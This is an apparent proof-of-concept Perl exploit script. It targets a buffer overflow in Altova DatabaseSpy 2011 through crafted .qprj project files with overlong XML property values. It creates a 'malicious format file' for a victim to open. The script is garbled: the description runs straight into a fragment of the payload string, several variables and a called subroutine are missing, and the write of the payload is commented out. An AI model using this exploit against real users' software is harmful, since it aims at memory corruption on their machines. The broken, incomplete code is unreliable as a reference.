#!/usr/bin/perl # # # Title: Altova DatabaseSpy 2011 Project File Handling Buffer Overflow Vulnerability # # # Vendor: Altova GmbH # Product web page: http://www.altova.com # Affected version: Enterprise Edition 2011 # # # Summary: Altova DatabaseSpy® 2011 is the unique multi-database query, design, # and database comparison tool. It connects to all major databases, easing SQL # editing, database structure design, database content editing, database schema # and content comparison, and database conversion for a fraction of the cost of # single-database solutions. # # # Desc: The Altova DatabaseSpy 2011 Enterprise Edition suffers from a buffer # overflow/memory corruption vulnerability when handling project files (.qprj). # The issue is triggered because there is no boundry checking of some XML tag # property values, ex: \xA\xA\xA\x9\xA\x9\xA\x9\xA\x9<". "Folder FolderName=\"Data Diff\" Type=\"DataDiffR". "ootFolder\"/>\xA\x9\xA\x9\xA\xA"; sub code() { system ("color 3"); #~!@#$%^&*()_+|<>?:"{}=-`';/.,0 open qprj, ">./$FILENAME" || die "\nCan't open #$_@ $FILENAME: $!"; print "\n (1) "; system("pause"); # print qprj $PROJECT; print "\n (2) Buffering mali". "cious format file . . .\r\n"; sleep 2; close qprj; print "\n (3) File $FILENAME created successfully". "!\n"; sleep 2; system ("color \x44"); sleep 1; #.% print "\n (4) And the color is changed.\n"; } print "\n"; header(); code(); #EOF